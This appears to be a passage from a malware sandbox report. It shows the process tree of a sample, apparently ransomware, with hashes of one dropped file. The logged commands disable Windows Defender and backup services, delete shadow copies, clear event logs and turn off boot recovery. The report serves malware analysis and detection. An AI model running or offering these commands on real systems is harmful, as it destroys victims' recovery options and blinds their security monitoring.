C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "UI0Detect" /y3⤵PID:620
-
C:\Windows\system32\net.exenet.exe stop "VSS" /y2⤵
- Suspicious use of WriteProcessMemory
PID:2028 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VSS" /y3⤵PID:2044
-
C:\Windows\system32\net.exenet.exe stop "wbengine" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1048 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "wbengine" /y3⤵PID:1968
-
C:\Windows\system32\net.exenet.exe stop "WebClient" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1084 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "WebClient" /y3⤵PID:736
-
C:\Windows\system32\sc.exesc.exe config "NetMsmqActivator" start= disabled2⤵PID:964
-
C:\Windows\system32\sc.exesc.exe config "SamSs" start= disabled2⤵PID:1196
-
C:\Windows\system32\sc.exesc.exe config "SDRSVC" start= disabled2⤵PID:1900
-
C:\Windows\system32\sc.exesc.exe config "SstpSvc" start= disabled2⤵PID:1712
-
C:\Windows\system32\sc.exesc.exe config "UI0Detect" start= disabled2⤵PID:1020
-
C:\Windows\system32\sc.exesc.exe config "VSS" start= disabled2⤵PID:1924
-
C:\Windows\system32\sc.exesc.exe config "wbengine" start= disabled2⤵PID:1704
-
C:\Windows\system32\sc.exesc.exe config "WebClient" start= disabled2⤵PID:1600
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:376
-
C:\Windows\system32\reg.exereg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f2⤵PID:108
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f2⤵PID:516
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f2⤵PID:1632
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f2⤵PID:1764
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f2⤵PID:620
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f2⤵PID:2032
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f2⤵PID:1852
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f2⤵PID:1120
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f2⤵PID:1548
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f2⤵PID:2012
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f2⤵PID:1736
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f2⤵PID:556
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f2⤵PID:888
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:1976
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:1684
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable2⤵PID:792
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable2⤵PID:1404
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable2⤵PID:1992
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable2⤵PID:1052
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable2⤵PID:1624
-
C:\Windows\system32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f2⤵PID:1176
-
C:\Windows\system32\reg.exereg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f2⤵PID:1688
-
C:\Windows\system32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f2⤵PID:1188
-
C:\Windows\system32\reg.exereg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f2⤵PID:1660
-
C:\Windows\system32\reg.exereg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f2⤵PID:968
-
C:\Windows\system32\reg.exereg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f2⤵PID:1416
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1104
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:436
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1540
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:676
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies security service
PID:1748 -
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1696
-
C:\Windows\system32\vssadmin.exevssadmin.exe delete shadows /all /quiet2⤵
- Interacts with shadow copies
PID:816 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl system2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2000 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl security2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1948 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl application2⤵
- Suspicious use of AdjustPrivilegeToken
PID:524 -
C:\Windows\System32\Wbem\wmic.exewmic.exe SHADOWCOPY /nointeractive2⤵
- Suspicious use of AdjustPrivilegeToken
PID:832 -
C:\Windows\System32\Wbem\wmic.exewmic.exe shadowcopy delete2⤵PID:1616
-
C:\Windows\system32\bcdedit.exebcdedit.exe /set {default} bootstatuspolicy ignoreallfailures2⤵
- Modifies boot configuration data using bcdedit
PID:2060 -
C:\Windows\system32\bcdedit.exebcdedit.exe /set {default} recoveryenabled no2⤵
- Modifies boot configuration data using bcdedit
PID:2084 -
C:\Windows\system32\cmd.execmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All2⤵PID:2104
-
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All3⤵
- Deletes Windows Defender Definitions
PID:2124 -
C:\Windows\system32\cmd.execmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true2⤵PID:2136
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIOAVProtection $true3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2156 -
C:\Windows\system32\cmd.execmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true2⤵PID:2228
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableRealtimeMonitoring $true3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2248
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD58fef5645ac7250580d23b10c8a777ffc
SHA1cd3aa2da88aa658ba0c48e707c89f242bcec5043
SHA256fd0c3e62f5e616e4f1b62faada33ff626e3f7f646e814a4b1675abb1068585f1
SHA5123de2c2c044bd529872deac4052ec4d5fa4d3f108cb9250c94a4b1e32f03730ff3d8eca426f6be6c5582d4b63ca428c3e002247af61039248709c615aaf4a2c8e